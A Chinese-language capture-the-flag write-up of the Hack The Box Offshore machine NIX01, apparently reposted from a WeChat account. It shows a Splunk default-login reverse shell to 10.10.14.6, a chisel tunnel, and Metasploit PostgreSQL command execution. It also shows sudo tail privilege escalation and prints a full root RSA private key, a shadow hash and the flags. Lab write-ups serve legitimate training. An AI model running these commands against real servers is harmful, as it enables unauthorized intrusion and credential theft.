首先扫描靶机
nmap -sC -sV -sT -T5 10.10.110.123
扫描出4个端口,8000端口是指向Splunkd页面,先去看看,如果第一次进入的话,账号密码是admin:changeme,登录进去后会进入到这个界面,可以参考这篇文章获得shell
首先点击左上角的Search&Reporting
会进入到一个搜索界面,点击上面的方向号,会弹出三个选项
选择第二个Manage Apps
进入之后会发现很多apps,这是我们安装属于我们自己的app,点击上面的install app from file,然后在这个网址下载所需的包
https://codeload.github.com/TBGSecurity/splunk_shells/tar.gz/refs/tags/1.2
下载完,然后上传,上传之后会提醒你重启页面,重启之后再选用刚刚自己的app
我们的app安装在最底下,先点击后面的Permissions,修改一下,不然无法反弹,全部打勾,然后回到search那里输入:
| revshell std 10.10.14.6 4444
然后成功反弹shell
成功拿到一个flag:OFFSHORE{b3h0ld_th3_P0w3r_0f_$plunk}
或者如果无法添加权限的话,将文件设置在界面,直接点击
设置的地方是在Manage Apps里面,文件后面的Edit properties
将第二个设置为Yes,就是可以显示在界面,方便操作
在/home/mark/里面有个隐藏的psql历史记录,说明这个靶机安装了psql数据库。数据库用户名在passwd里面可以看到。
首先查看一下数据库的版本,但是先登录,默认用户名是postgres,输入:
/usr/local/pgsql/bin/psql -U postgres
因为终端无法正常的显示,所有先将psql端口使用chisel代理出来,psql的默认端口是5432,输入:
chisel server --reverse -p 1010./tmp/chisel client 10.10.14.6:1010 R:5432:127.0.0.1:5432 &
可以参考这篇文章:https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
代理出来后使用msfconsole里面的RCE:
exploit/multi/postgres/postgres_copy_from_program_cmd_exec
由于将端口单独代理出来,直接设置本地ip(payload可以设置payload/cmd/unix/python/meterpreter_reverse_tcp),这样可以有meterpreter的会话
成功拿到postgres的shell,直接输入sudo -l进行提权
在网上找到了对/usr/bin/tail的提权:https://gtfobins.github.io/gtfobins/tail/#sudo
先使用提权拿到root 的id_rsa
LFILE="/root/.ssh/id_rsa"sudo tail -c1G "$LFILE"
-----BEGIN RSA PRIVATE KEY-----MIIEowIBAAKCAQEAoqnXGZVkxIu7Y9+Bln8k1irzetIT+WkRLHeHvj1Hv0FV/JOOcqAatFMmCe7NERWu+x2yrT/JT9kdb/Z0YS5WLEbWdxJihhgj1YTwRLjRw818UxyrHBGufOU4rHmitZAMVWiPIgZS/+7dxt4PEhxVdj2MJMTzzvo4MU1NBWfQt8p/i6kwHKH93iCrUHvUsDqHbJnK9Z03QL5ZaGN7hPntHUDLLpOvBO9e2sjUJAUuu2HUeNGfOtYEBEe3J21FSUTucoXiEzSEg5eyK/X6JywELbPB4wfB+vDNN1D8GIQdemX1HjrIWm3F/WnZ3wXzYQRAg44SsZHherfVKPM8J/jv6QIDAQABAoIBAFyAgy8sUtqmr9Dy6InCEhus3ztoPi2mfzqvWsVnqeZsbE6vRuGOhMEpS8d4QqvFjfWGBPcbAAtlZ6UlHTeqlxykyA98qASjs7UX3V7nT3qu31WQRwo2T+j8nYcPwOTJXwou5L6vpAGhQAN4gk+FR2BvTcQXMKLyjoQS9ortZ7csC9ZSJtZpU8inH0eIHmhG9aou2grGfKLbHDyTTd7x3FLCX15K2XQKaKMnOt1upWcn5KoXpRY3xrvSEaNOeON1f3gmdDi9CDxfVrJHLE68QixJsdrmXBQJBMoNXje9m6Y6r0AzqHLXPQtscEqNIsePYxt6mnUfthTYX8Fbv1VxU9UCgYEAzF6M4TL+nnTiKhb+LFEx8e3B3Rb4h9SZADq5ha44p8KtJFanV0oGeAO67BA1oCA976R0FeZpiiIvZlxAmhw2K8tSJ53QJL9xnfr2OMJytQr/9ov1mF4UMAqQSE2vMisfQEb6moWUQKEa8aZ+VYBnE2Lp9oAAQWsVINzVMKxdHBsCgYEAy8H9KcgtoVNzFJZQxPNIwR6QdngCn2GKu93+Z4vX/d00zA/XkpkYQHZvqKwSafmgu2AXj5hhJkUVz+iNZzU6pZKBoHxSNnJOynSeQMzHNKikNud9YW8pas+buYi2TSxTFL1LH6vKATQn3aSFWsM/eNFVdDGp8mcPkQ3vl5FIXEsCgYASbS/8mhF1DgraSqpuKn/7VTmWipyr+pI1ABZ8JCI9lgLwdNOvvh/pMETpRejf4ChVdBl3ZAf+CWkGrKiyfHqx5iopIkSDG7PNz7PlmDqpci1z+FiTfWAKmNk7e62hM1wk+oFb71FXpm78fMuFQAeLKu73Z8EeJN6J0P9z3QakIwKBgQCQZMGumVBU0hlsjnVgjPOS/8DqY3OgVPSG2/PMl1qSae9faR6goeOA0y2fv4kxFpjkEF3CAf9eqnihpLCIYj1UVnWMMG3mba0OZgQ78aJ928C7s+KzaJ5WNheqLIrcN7wMp3SUVh5KKhbSSCPExTa2vMotFIDV6lkqt1CB/Y/k7wKBgESEY+taPfoUO49mMsmiBn96XlTx9pCg6WlXPZeCTCymUXDovNn1HfxKCS5Lckpjr11RNP+xb8G1Q8xSiJNfMtrBsVh2es7QxVnrQsd4B+2UQC5llehHD/UkpnJob1HS8o17jQFgleQYYFvDDtGqj87ZgfcLBmc+JbP+oYiXbfKE-----END RSA PRIVATE KEY-----
将密钥保存下来,然后登录
ssh -D 1080 root@10.10.110.123 -i id_rsa
登录成功,拿到root flag:OFFSHORE{st0p_tai1ing_m3_br0}
Root shadow:root:$6$UM9dnBFE$5LRqppNoZhJmLz0.cLGlZXeDWYjy4u4MWbTW/8vMu.vSCbhTFlCLDsRvtxj8kF1RrlbCeyJHitm9g9.pLe4uM1:17652:0:9999
使用find命令寻找一下剩下的flag,这个靶机一共3个flag,第三个flag:OFFSHORE{fun_w1th_m@g1k_bl0ck$}
find / -name flag.txt
原文始发于微信公众号(Jiyou too beautiful):HTB-Offshore-NIX01笔记
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论